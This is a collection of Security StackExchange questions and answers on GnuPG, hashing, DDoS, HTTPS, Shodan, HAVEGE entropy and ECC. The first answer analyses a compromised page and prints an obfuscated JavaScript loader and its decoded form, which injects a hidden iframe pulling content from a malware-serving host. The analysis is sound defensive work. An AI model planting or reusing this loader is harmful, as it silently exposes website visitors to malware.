The first (in bold) code is actually this: Decoded with deobfuscatejavascript.com (function() { var pzt = document.createElement('iframe'); pzt.src = 'http://www.betterbailbonds.net/VLNSec01/cnt.php'; pzt.style.position = 'absolute'; pzt.style.border = '0'; pzt.style.height = '1px'; pzt.style.width = '1px'; pzt.style.left = '1px'; pzt.style.top = '1px'; if (!document.getElementById('pzt')) { document.write('<div id=\'pzt\'></div>'); document.getElementById('pzt').appendChild(pzt); } })(); Yes. This stuff does look malicious. It appears to be including files from another (probably also hacked) server in order to do -something-. The reason the code looks like this is because someone has attempted to obfuscate the code using some tools. Luckily its reversible. The code above is basically creating an 'invisible' iframe in the page and loading the URL from betterbailbonds.net. Kaspersky Internet Security Flags it as a malware serving site. The second chunk of code is base64 encoded and gzinflated decoded with: This tool echo " p=parseInt;ss=(123)?String.fromCharCode:0;asgq=\"28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!6@!78!62!6@!67!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!77!77!2e!62!65!74!74!65!72!62!61!6@!6c!62!6f!6e!64!73!2e!6e!65!74!2f!56!4c!4e!53!65!63!30!31!2f!63!6e!74!2e!70!68!70!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!6@!78!62!6@!67!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!6@!78!62!6@!67!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!6@!78!62!6@!67!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!6@!78!62!6@!67!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b\".replace(/@/g,\"9\").split(\"!\");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=126;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s=\"\";if(zz)for(i=0;i-509!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}"; The above code then deobfuscates (had to do it manually this time because the online one threw errors??) again into something similar but with different variable names: ( function () { var ixbig = document.createElement('iframe'); ixbig.src = 'http://www.betterbailbonds.net/VLNSec01/cnt.php'; ixbig.style.position = 'absolute'; ixbig.style.border = '0'; ixbig.style.height = '1px'; ixbig.style.width = '1px'; ixbig.style.left = '1px'; ixbig.style.top = '1px'; if (!document.getElementById('ixbig')) { document.write('<div id=\'ixbig\'></div>'); document.getElementById('ixbig').appendChild(ixbig); } })(); A quick google search shows that it appears you've been part of a wider attack with many people having similar code embedded in their pages. This also appears to be a duplicate of this stackexchage post Edit: I've just noticed that accessing this page flags it as malware via kaspersky internet security. It's obviously aware of the script and define it as HEUR:Trojan.Script.Generic
{ "source": [ "https://security.stackexchange.com/questions/33664", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24190/" ] }
33,752
If I encrypt the same file twice with GnuPG, using the same key, will I get the same result? or is it using some random/psudeo-random segment to improve security like rsynccrypto?
Generally speaking, no, encrypting the same file with the same key will not produce the same file, for three reasons: The OpenPGP format (which GnuPG implements) uses hybrid encryption : a random, symmetric key is encrypted with the recipient's public key (of type RSA or ElGamal), and that symmetric key is itself used to encrypt the message body with a symmetric encryption algorithm. Hybrid encryption is used because asymmetric encryption are very limited in their range (e.g. a 2048-bit RSA key cannot encrypt more than 245 bytes in one go) and have high overhead (both in CPU and resulting message size). Since the symmetric key is not saved anywhere on the sender's side, a new random key will be created each time, and will be different with overwhelming probability. Asymmetric encryption itself is randomized. E.g., with RSA , the padding includes random bytes. This is needed "in general", because the public key is public, so everybody knows it; if encryption was deterministic, attackers could run an exhaustive search on the message . This would not be an issue in the specific case of OpenPGP (the message is a random key, large enough to defeat exhaustive search on its own), but standards for RSA or ElGamal have a larger scope and include random padding. When doing the symmetric encryption itself, a random IV is used, and will be different (with overwhelming probability) for each invocation. See section 5.7 for details. The third point also applies when doing password-based encryption (encryption is done with a password, not with a recipient's public key). Password-based encryption also adds a fourth randomization, which is the salt in the password-to-key transform .
{ "source": [ "https://security.stackexchange.com/questions/33752", "https://security.stackexchange.com", "https://security.stackexchange.com/users/13660/" ] }
33,768
I clearly understand that the security seals (verisign or norton secure etc.) shown on banking and other websites are generated using a script and available only after an ssl certificate is purchased and installed. The certificate vendors say "the seal helps improve your customers' perception of safety and trust" I just somehow can not convince myself with this idea of 'perception of safety'. No user is going to click the seal every time to see if it is really a seal by verisign.Most users will be unaware of this feature. The image can easily faked for on a phishing site. The vendors claim that it is a protection mechanism against phishing and Identity theft.
As Rook pointed out, security theatre is a big part of how consumer perception is exploited to ensure that customers believe that something is safe, without the vendor having to go through all that complicated hassle with actual security . The TSA is a great example, but there are many others: Extended Verification on SSL certificates are largely theatre, as the EV process does nothing to actually improve the cryptographic or algorithmic security of the transaction. If a 3rd party wants to get a certificate for the domain from a dodgy CA, they can do so without the EV and 99% of users wouldn't notice. The design of certain enterprise-level security appliances, from a physical and interactive perspective, are often tailored to invoke images of robustness. This usually involves building the unit out of sturdy black metal, with a few blinky blue lights on the front, and putting padlocks and other such imagery on the web panel. Bag searches at large events like concerts are largely security theatre. It's near impossible to get a few hundred people through a proper bag search process, so the staff take a quick look and let you through. More often than not, they're just trying to stop you bringing a big bottle of vodka, so you have to pay at the bar. But part of it is to make you feel safer, despite the fact that anyone could easily conceal weapons, drugs, etc. without detection. Anti-phishing techniques such as secret images are (usually) security theatre, in that it is often either trivial for a 3rd party to steal the secret image from the site without authentication, or that the image is displayed after the user has entered their full set of authentication credentials. At the end of the day, it's all about marketing. If a company can sell you the image of something being more secure than it is, they are more likely to get a sale because you have peace of mind.
{ "source": [ "https://security.stackexchange.com/questions/33768", "https://security.stackexchange.com", "https://security.stackexchange.com/users/21234/" ] }
33,783
I saw that some e-commerce scripts can also run without ssl, but everyone recommends to activate it to protect sensitive data. I just saw a site that has an e-shop link, if i click it my browser says that the security certificate is not reliable, and in fact if i click on "continue to the site" it switches to http. Is it compulsory to activate ssl on a shop?
If you don't use HTTPS, but plain HTTP, then: You will get hacked; credit card numbers will be stolen while in transit, and customers will sue you into oblivion. You would be hacked anyway at some point, that's the lot of Web sites. Even if the hacker entered by some other way, post-mortem analysis will show the lack of SSL, and this will look real bad. You will lose customers . Many potential customers won't enter their credit card number, for lack of the reassuring padlock picture; they will instead shop at a competitor's Web site. So you are not mandated by Law to use HTTPS, but if you do not, your business will fail. Open business competition is quite akin to Darwinian selection: the weak dies. Edit: @XzKto's comment shows that I have not been completely clear: the SSL bit is needed for the actual transaction, when banking values (e.g. credit card numbers) travel over the Internet. That's the one I am talking about. If the site records payment details (so that you can come back and buy again without reentering the credit card number), then the "buy it now" button must also be SSL-protected (to avoid an attacker "clicking" on it in your name). The rest of the site needs not necessarily be SSL-protected, although site-wide SSL is still often a good idea (it is much simpler than trying to work out which parts of the site must be protected, and which parts can be left out).
{ "source": [ "https://security.stackexchange.com/questions/33783", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24336/" ] }
33,811
Is it possible - in theory - to stop 1 a DDoS attack of any size? Many people claim it's impossible to stop DDoS attacks and tell me I just shouldn't mess with the wrong people on the internet. But what if, in like 5 years, everyone is able to rent a botnet? Shouldn't we just re-think the whole internet architecture then? 1: by stop I also accept remove the negative effects aka keep the service running.
Imagine a shopping mall. By definition, anybody can enter the mall and then browse the shops. It is public. The shops are expecting people to come by, look at the displays, maybe enter and then buy things. In the mall, there is a shopkeeper, who sells, say, computers. Let's call him Jim. He wants people to come by and see the computers and be enticed into buying them. Jim is the nice guy in our story. Let there be Bob. Bob is a disgruntled nihilist who hates Jim. Bob would go to great lengths to make Jim unhappy, e.g. disrupting Jim's business. Bob does not have many friends, but he is smart, in his own twisted way. One day, Bob spends some money to make the local newspaper publish an ad; the ad states, in big fonts and vivid colours, that Jim runs a great promotion at the occasion of his shop's tenth birthday: the first one hundred customers who enter the shop will receive a free iPad . In order to cover his tracks, Bob performs his dealings with the newspaper under the pseudonym of "bob" (which is his name, but spelled backwards). The next day, of course, the poor Jim is submerged by people who want a free iPad. The crowd clogs Jim's shop but also a substantial part of the mall, which becomes full of disappointed persons who begin to understand that there is no such thing as a free iPad. Their negativeness makes them unlikely to buy anything else, and in any way they cannot move because of the press of the crowd, so business in the mall stops altogether. Jim becomes highly unpopular, with the ex-iPad-cravers, but also with his shopkeeper colleagues. Bob sniggers. At this point, Jim contacts the mall manager Sarah. Sarah decides to handle the emergency by calling the firemen. The firemen come with their shining helmets, flashing trucks, screaming sirens and sharp axes, and soon convince the crowd to disperse. Then, Sarah calls her friend Gunther. Gunther is a son of German immigrants, a pure product of the US Melting Pot, but more importantly he is a FBI agent, in charge of the issue. Gunther is smart, in his own twisted way. He contacts the newspaper, and is first puzzled, but then has an intuitive revelation: ah-HA! "bob" is just "Bob" spelled backwards ! Gunther promptly proceeds to arrest Bob and send him meet his grim but legal fate before the county Judge. Finally, in order to avoid further issues with other nihilists who would not be sufficiently deterred by the vision of Bob's dismembered corpse put on display in front of the mall, Sarah devises a mitigation measure: she hires Henry and Herbert, two mean-looking muscular young men, and posts them at the mall entries. Henry and Herbert are responsible for blocking access should a large number of people try to come in, beyond a given threshold. If a proto-Bob strikes again, this will allow the management of the problem on the outside , in the parking lot, where space is not lacking and crowd control much easier. Morality: a DDoS cannot be prevented, but its consequences can be mitigated by putting proactive measures, and perpetrators might be deterred through the usual, historically-approved display of muscle from law enforcement agencies. If botnets become too easy to rent, predictable consequences include increased police involvement, proactive authentication of users at infrastructure level, shutting off of the most disreputable parts of the network (in particular Internet access for the less cooperative countries), and a heavy dose of disgruntlement and sadness at the loss of a past, more civilized age.
{ "source": [ "https://security.stackexchange.com/questions/33811", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24362/" ] }
33,837
I have heard of programatically difference b/w GET and POST in web applications. Asking in curiosity which is more secure, GET method or POST method in web applications, I expect answers in terms of protocols too (i.e in http and https )?
POST is more secure than GET for a couple of reasons. GET parameters are passed via URL. This means that parameters are stored in server logs, and browser history. When using GET, it makes it very easy to alter the data being submitted the the server as well, as it is right there in the address bar to play with. The problem when comparing security between the two is that POST may deter the casual user, but will do nothing to stop someone with malicious intent. It is very easy to fake POST requests, and shouldn't be trusted outright. The biggest security issue with GET is not malicious intent of the end-user, but by a third party sending a link to the end-user. I cannot email you a link that will force a POST request, but I most certainly can send you a link with a malicious GET request. I.E: Click Here for the best free movies! Edit: I just wanted to mention that you should probably use POST for most of your data. You would only want to use GET for parameters that should be shared with others, i.e: /viewprofile.php?id=1234, /googlemaps.php?lat=xxxxxxx&lon=xxxxxxx
{ "source": [ "https://security.stackexchange.com/questions/33837", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11679/" ] }
33,860
I have been interested in Information Security. I was recently introduced to the idea of hashing. What I currently understand about hashing is that it takes the password a user enters. Then it randomly generates a "hash" using a bunch of variables and scrambling everything. Then when you enter this password to log in it matches that password to the hash. There are just a couple of things I don't understand about it. Why is it so hard to crack these hashes? I would assume once you found the method they are using to encrypt it (lets go with an extremely simple one like Caesar's cipher once you find out how many you have to shift over you can do it for whole books). Even if it uses something like time and jumbles it there are some really big ways you can limit the options (Lets use the Caesar cipher they're using the year mod x you already know that there are two possible years realistically then you just have to figure out the second piece of the puzzle). If they are generated randomly (even if two passwords are the same they come out differently) how can they tell if it's correct? How are they cracked. How does hash cat know when it has successfully decrypt the password? Related video (but doesn't exactly answer my question): https://www.youtube.com/watch?v=b4b8ktEV4Bg
Quick, factor 1081. Or if you prefer, answer this: what's 23 times 47? Which one is easier? It's easier to perform a multiplication (just follow the rules mechanically) than to recover the operands given only the product. Multiplication. (This, by the way, is the foundation of some cryptographic algorithms such as RSA .) Cryptographic hash functions have different mathematical foundations, but they have the same property: they're easy to compute going forward (calculate H(x) given x), but practically impossible to compute going backward (given y, calculate x such that H(x) = y). In fact, one of the signs of a good cryptographic hash function is that there is no better way to find x than trying them all and computing H(x) until you find a match. Another important property of hash functions is that two different inputs have different hashes. So if H(x 1 ) = H(x 2 ), we can conclude that x 1 = x 2 . Mathematically speaking, this is impossible — if the inputs are longer than the length of the hash, there have to be collisions. But with a good cryptographic hash function, there is no known way of finding a collision with all the computing resources in the world. If you want to understand more about cryptographic hash functions, read this answer by Thomas Pornin . Go on, I'll wait. Note that a hash function is not an encryption function. Encryption implies that you can decrypt (if you know the key). With a hash, there's no magical number that lets you go back. The main recommended cryptographic hash functions are SHA-1 and the SHA-2 family (which comes in several output sizes, mainly SHA-256 and SHA-512). MD5 is an older one, now deprecated because it has known collisions. Ultimately, there is no mathematical proof that they are indeed good cryptographic hash functions, only a widespread belief because many professional cryptographers have spent years of their life trying, and failing, to break them. Ok, that's one part of the story. Now a password hash is not directly a cryptographic hash function. A password hash function (PHF) takes two inputs: the password, and a salt. The salt is randomly generated when the user picks his password, and it is stored together with the hashed password PHF(password, salt). (What matters is that two different accounts always have different salts, and randomly generating a sufficiently large salt is a good way to have this property with overwhelming probability.) When the user logs in again, the verification system reads the salt from the password database, computes PHF(password, salt), and verifies that the result is what is stored in the database. The point of the salt is that if someone wants to crack a password, they'll have to know the hash before they can start , and they have to attack each account separately. The salt makes it impossible to perform a lot of cracking work in advance, e.g. by generating a rainbow table . This answers (2) and (3) — the legitimate verifier and the attacker find out in the same way whether the password (entered by the user, or guessed by the attacker) is correct. A final point in the story: a good password hash function has an additional property, it must be slow. The legitimate server only needs to compute it once per login attempt, whereas an attacker has to compute it once per guess, so the slowness hurts the attacker more (which is necessary, because the attacker typically has more, specialized hardware). If you ever need to hash passwords, don't invent your own method . Use one of the standard methods : scrypt , bcrypt or PBKDF2 .
{ "source": [ "https://security.stackexchange.com/questions/33860", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20867/" ] }
34,030
There's been a lot of buzz around this recent CNN article about Shodan, a search engine that can find and allow access to unsecured internet-connected devices. Shodan runs 24/7 and collects information on about 500 million connected devices and services each month. It's stunning what can be found with a simple search on Shodan. Countless traffic lights, security cameras, home automation devices and heating systems are connected to the Internet and easy to spot. Shodan searchers have found control systems for a water park, a gas station, a hotel wine cooler and a crematorium. Cybersecurity researchers have even located command and control systems for nuclear power plants and a particle-accelerating cyclotron by using Shodan. What's really noteworthy about Shodan's ability to find all of this -- and what makes Shodan so scary -- is that very few of those devices have any kind of security built into them. [...] A quick search for "default password" reveals countless printers, servers and system control devices that use "admin" as their user name and "1234" as their password. Many more connected systems require no credentials at all -- all you need is a Web browser to connect to them. It sounds to me like some of these devices have been secured ostensibly but aren't actually secure because the passwords, etc., are obvious and/or unchanged from default settings. How can I (either as a "normal" person or a professional) take steps to prevent my devices from being accessible by crawlers like Shodan? Are there other ways to mitigate my risk of discovery by something like Shodan?
Shodan references publicly available machines which work like this: Just don't do it. Edit: analogy is relevant ! Shodan connects to machines and asks for their "banner", a publicly available text which may simply say: "to enter, use this default password: 1234". You might want to avoid people knocking at the door by the simple expedient of installing a giant squid as a guard before the door (metaphorically, a firewall), but, really, it would be much safer to configure a non-default password.
{ "source": [ "https://security.stackexchange.com/questions/34030", "https://security.stackexchange.com", "https://security.stackexchange.com/users/5349/" ] }
34,202
On a Linux-based server, I follow basic practices as below: Make the admin account password long and complicated enough (i.e. theoretically speaking, password cannot be cracked within reasonable time). Monitor all incoming network traffic to the administrative files. To extend the layer of protection from #2 above, monitor local file changes (especially ones that have commands that require sudo privileges). Validate all user input, so that all of the user input is guaranteed to be safe. As a novice developer, I don't understand how a hacking is even feasible if the server admin practices the above.
Not making sure all security updates are applied? Remember, as the defender, you must win 100% of the time . A hacker only needs to win once. The steps you listed are also a lot easier said than done (except the password thing... and yet people still choose horrible passwords!). 2) Also, what's a "credible source" for a public facing web server? The entire Internet? The entire Internet, sans China/Russia (/some/other/countries)? Automated systems can detect many types of attacks, but just like antivirus they can only go so far. 3) Monitoring local files is good, but, again, it's not a panacea. What if the attacker manages to inject code into the web server, and then uses a kernel bug to get code into the kernel... without ever writing a file to the disk? At that point, they could write files to the disk, and use a root kit to prevent most (theoretically all ) online scans from noticing any changes to the system. And even if they only manage to exploit the web server, they can do everything the web server can do (which might be all the attacker was interested in anyways). 4) You should always validate user input. Most developers know this (and many try to do it). Sadly, it's much easier said than done, which is why we continue to see issue after issue where user input isn't appropriately validated. You'll never be able to guarantee any real piece of software is correctly validating all user input. Read some PHP+MySQL questions on StackOverflow to see how many people think mysqli_real_escape_string() prevents all SQL injection attacks ( "where ID = " . $val is vulnerable, even when $val is the output of mysqli_real_escape_string !). Even if you could (you can't) ensure every known attack vector was guarded against, you can't do anything more than wildly swinging in the dark against and unknown-unknown (well, continually educating yourself helps). As an example where your defenses wouldn't have done anything, I was taking part in a security course where we're doing "war games". I was able to root an opposing team's server by being able to get one of their user passwords off another machine (one of them screwed up and typed it into bash as a command by mistake, and they never thought to delete it from .bash_history ). From there, I spoofed the IP of the machine they usually logged in from, and SSHed in, inputting their username + password. I had limited access to the system. I then ran sudo vim , entered the same password again, and had vim spawn a bash shell. Tada! Root access, from a credible source, without modifying any local files in an unusual way, without exploiting a weak password (it was bad, but even the best password in the world wouldn't have helped), nor relying on unvalidated user input. At that point, being mischievous me, I manually modified all the log files related to my legitimate login, and obliterated their IDS (I'm betting they won't be observant enough to notice I replaced all of its binaries with copies of /bin/true !). A 'real' hacker would likely be far better equipped to ensure their activity wasn't detected by more vigilant admins, but I'd already accomplished my goal, and a small part of me wanted them to find out that someone got it.
{ "source": [ "https://security.stackexchange.com/questions/34202", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24668/" ] }
34,419
In computer security, we know that weak points in software are called vulnerabilities (if related to security). And once the vulnerability is found, theoretically it requires a piece of code as proof of concept (this is called an exploit ). In this context, the term payload is also mentioned. Then, what is the difference between 'payload' and 'exploit'?
The exploit is what delivers the payload. Take a missile as an analogy. You have the rocket and fuel and everything else in the rocket, and then you have the warhead that does the actual damage. Without the warhead, the missile doesn't do very much when it hits. Additionally, a warhead isn't much use if it goes off in your bunker without a rocket delivering it. The delivery system(missile) is the exploit and the payload (warhead) is the code that actually does something. Exploits give you the ability to 'pop a shell/run your payload code'. Example payloads are things like Trojans/RATs, keyloggers, reverse shells etc. Payloads are only referred to when code execution is possible and not when using things like denial of service exploits.
{ "source": [ "https://security.stackexchange.com/questions/34419", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20070/" ] }
34,523
While looking for solutions to entropy pool depletion on virtual machines, I came across an interesting project called haveged , which is based on the HAVEGE algorithm (HArdware Volatile Entropy Gathering and Expansion). It makes a pretty fantastic claim. HAVEGE is a random number generator that exploits the modifications of the internal CPU hardware states (caches, branch predictors, TLBs) as a source of uncertainty. During an initialization phase, the hardware clock cycle counter of the processor is used to gather part of this entropy: tens of thousands of unpredictable bits can be gathered per operating system call in average. If this really produces nearly unlimited high-quality entropy on headless virtual machines, it should be included in every server distribution by default! And yet, some people have raised concerns. "At its heart, [HAVEGE] uses timing information based on the processor's high resolution timer (the RDTSC instruction). This instruction can be virtualized, and some virtual machine hosts have chosen to disable this instruction, returning 0s or predictable results." (Source: PolarSSL Security Advisory 2011-02 on polarssl.org). And furthermore, popular NIST and ENT tests will sometimes give haveged a PASS even when it's intentionally mis-configured, and not actually producing random numbers! I replaced the “HARDTICKS” macro in HAVEGE with the constant 0 (zero) rather than reading the time stamp counter of the processor. This immediately failed the randomness test. However, when I used the constant 1 (one) instead, the ent test passed. And even nist almost passed with only a single missed test out of the 426 tests executed. (Source: Evaluating HAVEGE Randomness on engbloms.se). So, which virtualization platforms/hypervisors are safe to use with haveged in a virtual machine? And is there a generally accepted best practice way to test whether a source of randomness is producing sufficiently high quality numbers?
( Caveat: I certainly don't claim that HAVEGE lives up to its claims. I have not checked their theory or implementation.) To get randomness, HAVEGE and similar systems feed on "physical events", and in particular on the timing of physical events. Such events include occurrences of hardware interrupts (which, in turn, gathers data about key strokes, mouse movements, incoming ethernet packets, time for a hard disk to complete a write request...). HAVEGE also claims to feed on all the types of cache misses which occur in a CPU (L1 cache, L2 cache, TLB, branch prediction...); the behaviour of these elements depends on what the CPU has been doing in the previous few thousands clock cycles, so there is potential for some "randomness". This hinges on the possibility to measure current time with great precision (not necessarily accuracy), which is where the rdtsc instruction comes into play. It returns the current contents of an internal counter which is incremented at each clock cycle, so it offers sub-nanosecond precision. For a virtual machine system, there are three choices with regards to this instruction: Let the instruction go to the hardware directly. Trap the instruction and emulate it. Disable the instruction altogether. If the VM manager chooses the first solution, then rdtsc has all the needed precision, and should work as well as if it was on a physical machine, for the purpose of gathering entropy from hardware events. However, since this is a virtual machine, it is an application on the host system; it does not get the CPU all the time. From the point of view of the guest operating system using rdtsc , this looks as if its CPU was "stolen" occasionally: two successive rdtsc instructions, nominally separated by a single clock cycles, may report an increase of the counter by several millions . In short words, when rdtsc is simply applied on the hardware, then the guest OS can use it to detect the presence of an hypervisor. The second solution is meant to make the emulation more "perfect" by maintaining a virtual per-VM cycle counter, which keeps track of the cycles really allocated to that VM. The upside is that rdtsc , from the point of view of the guest, will no longer exhibit the "stolen cycles" effect. The downside is that this emulation is performed through triggering and trapping a CPU exception, raising the cost of the rdtsc opcode from a few dozen clock cycles (it depends on the CPU brand; some execute rdtsc in less than 10 cycles, other use 60 or 70 cycles) to more than one thousand of cycles. If the guest tries to do a lot of rdtsc (as HAVEGE will be prone to do), then it will slow down to a crawl. Moreover, the exception handling code will disrupt the measure; instead of measuring the hardware event timing, the code will measure the execution time of the exception handler, which can conceivably lower the quality of the extracted randomness. The third solution (disabling rdtsc ) will simply prevent HAVEGE from returning good randomness. Since it internally uses a PRNG , the output may still fool statistical analysis tools, because there is a huge difference between "looking random" and "being unpredictable" (statistical analysis tools follow the "look random" path, but cryptographic security relies on unpredictability). The VirtualBox manual claims that VirtualBox, by default, follows the first method ( rdtsc is unconditionally allowed and applied on the hardware directly), but may be configured to apply the second solution (which you don't want, in this case). To test what your VM does, you can try this small program (compile with gcc -W -Wall -O on Linux; the -O is important): #include <stdio.h> #if defined(__i386__) static __inline__ unsigned long long rdtsc(void) { unsigned long long int x; __asm__ __volatile__ (".byte 0x0f, 0x31" : "=A" (x)); return x; } #elif defined(__x86_64__) static __inline__ unsigned long long rdtsc(void) { unsigned hi, lo; __asm__ __volatile__ ("rdtsc" : "=a"(lo), "=d"(hi)); return ( (unsigned long long)lo)|( ((unsigned long long)hi)<<32 ); } #endif int main(void) { long i; unsigned long long d; d = 0; for (i = 0; i < 1000000; i ++) { unsigned long long b, e; b = rdtsc(); e = rdtsc(); d += e - b; } printf("average : %.3f\n", (double)d / 1000000.0); return 0; } On a non-virtual machine, with the "true" rdtsc , this shall report a value between 10 and 100, depending on the CPU brand. If the reported value is 0, or if the program crashes, then rdtsc is disabled. If the value is in the thousands, then rdtsc is emulated, which means that the entropy gathering may not work as well as expected. Note that even getting a value between 10 and 100 is not a guarantee that rdtsc is not emulated, because the VM manager, while maintaining its virtual counter, may subtract from it the expected time needed for execution of the exception handler. Ultimately, you really need to have a good look at the manual and configuration of your VM manager. Of course, the whole premise of HAVEGE is questionable. For any practical security, you need a few "real random" bits, no more than 200, which you use as seed in a cryptographically secure PRNG . The PRNG will produce gigabytes of pseudo-alea indistinguishable from true randomness, and that's good enough for all practical purposes. Insisting on going back to the hardware for every bit looks like yet another outbreak of that flawed idea which sees entropy as a kind of gasoline, which you burn up when you look at it.
{ "source": [ "https://security.stackexchange.com/questions/34523", "https://security.stackexchange.com", "https://security.stackexchange.com/users/1092/" ] }
34,567
How is with the support for ECC (Elliptic Curve Cryptography) in (Open)PGP so far? It seems that GnuPG (The GNU Privacy Guard) doesn't have an official implementation - but I did find the gnupg-ecc project ( ECC-enabled GnuPG per RFC 6637 ) on Google Code: This project brought to life Elliptic Curve Cryptography support in OpenPGP as an end-user feature. Users can simply select an ECC key generation option in gpg2 --gen-key and then use the generated public key as they normally would use any other public key, as shown here . I know that Symantec supports ECC. Are there reasons not to use ECC? EDIT I did some more research and found out that ECC found it's way to the main line of gnupg a long time agao, but only in the developer version : $ gpg2 --expert --gen-key gpg: NOTE: THIS IS A DEVELOPMENT VERSION! gpg: It is only intended for test purposes and should NOT be gpg: used in a production environment or with production keys! Please select what kind of key you want: (1) RSA and RSA (default) (2) DSA and Elgamal (3) DSA (sign only) (4) RSA (sign only) (7) DSA (set your own capabilities) (8) RSA (set your own capabilities) (9) ECDSA and ECDH (10) ECDSA (sign only) (11) ECDSA (set your own capabilities) Your selection?`
I see two main reasons why you might not want to use ECC : Practical reason: communication necessarily involves two parties, the sender and the receiver. ECC can be used only if both sender and receiver support it. As you noticed, existing, deployed implementations are not necessarily up to it yet; if you use an ECC public key, people may send you messages encrypted with that key, or verify your signatures with that key, only if their OpenPGP implementation includes the relevant code. So your choice of ECC or not ECC depends on whether you want to maximize interoperability or prefer to be an "early adopter" (although in the case of ECC, really early adopters are already there; ECC is becoming mainstream). Moral reason: mathematically, we don't have proof that any of the cryptographic algorithms that we employ is really robust against attacks. We don't even know if it is mathematically possible to be robust against attacks. Right now, the only method we have to assess the strength of any cryptographic algorithm is to define it, and then let a lot of cryptographers work on it for some years. If none of these smart people found anything wrong with the algorithm, then you can know that if the algorithm is weak, then, at least, it is not obviously weak. Elliptic Curves have been proposed as objects suitable for cryptography in 1985 (by Koblitz and Miller, independently). The mathematics of elliptic curves have been studied for about 40 years before that. So ECC can sport about 70 years of exposure, 30 of which in a definitely cryptographic setting. That's not bad. Integer factorization , on which RSA is based, can boast 35 years of cryptographic exposure (RSA was proposed in 1978), and more than a whooping 2500 years for the underlying mathematics. Therefore it may be argued that the security of RSA is "more understood" than that of elliptic curves. Personally, I think that ECC is mature enough to be deployed, and since ECC are highly fashionable, implementations become commonplace and we can expect GnuPG to soon align itself. Thus, my recommendation is: ECC is fine, as long as you are ready to encounter some interoperability issues for a few years. (One dark spot of ECC deployment is that there are very few "generic" ECC implementations; most implementations are specific to a restricted set of supported curves, often restricted to the two NIST P-256 and P-384 curves. The choice of curve for your key thus has a non-trivial impact on interoperability. P-256 is fine for security, though, so you can use it and stop worrying.)
{ "source": [ "https://security.stackexchange.com/questions/34567", "https://security.stackexchange.com", "https://security.stackexchange.com/users/3394/" ] }
34,764
For a few days, my mobile device has been able to catch Wi-Fi signals that are within its radius. It's not asking for a password to use the service. So, I'm using the Wi-Fi service whenever I need to. Is there any chance to hack my email and other accounts which I'm opening using this service? Are there any other security issues with this type of access?
Unprotected Wifi networks, particularly in public places, are most certainly a threat. This is because you are connecting to a network without knowing who else could be on the network. 'Free Wifi' provided by cafes, restaurants, etc serve as excellent places for harvesting passwords. The attacker will perform a Man in the Middle attack , typically by employing ARP Cache Poisoning . At that point, the attacker can read all plaintext passwords , including unsecured email (Email that does not use TLS), unencrypted ftp, websites without SSL, etc. Not to mention they can see all your google searches, all domains that you visit (encrypted or not) and so forth. And they got to this point without putting in any real effort, ARP Cache Poisoning and Packet Sniffing are easy. A more advanced attacker might set up an active proxy on his machine to perform attacks such as SSL Stripping , which would give him access to all sites you visit, including HTTPS. This means he now has your PayPal, Facebook and Twitter passwords. Moving on, an attacker might target your machine directly, if you have not updated your software in a while, is it likely that he can spawn a shell with Metasploit and download all your files for later analysis. This includes any saved browser passwords, authentication cookies, bank statements etc. TL;DR: When connecting to a network, you are exposing your device and all your traffic to all other users of that network. In an open WiFi this includes the girl sat across the street in the back of a van with a Kali laptop and a GPU array . Update your software and don't log into anything sensitive without using a VPN.
{ "source": [ "https://security.stackexchange.com/questions/34764", "https://security.stackexchange.com", "https://security.stackexchange.com/users/25117/" ] }
34,972
Why is Ctrl + Alt + Del required at login on certain Windows systems (I have not seen it elsewhere, but contradict me if I'm wrong) before the password can be typed in? From a usability point of view, it's a bad idea as it's adding an extra step in getting access. Does it improve security in any way, and if so, how?
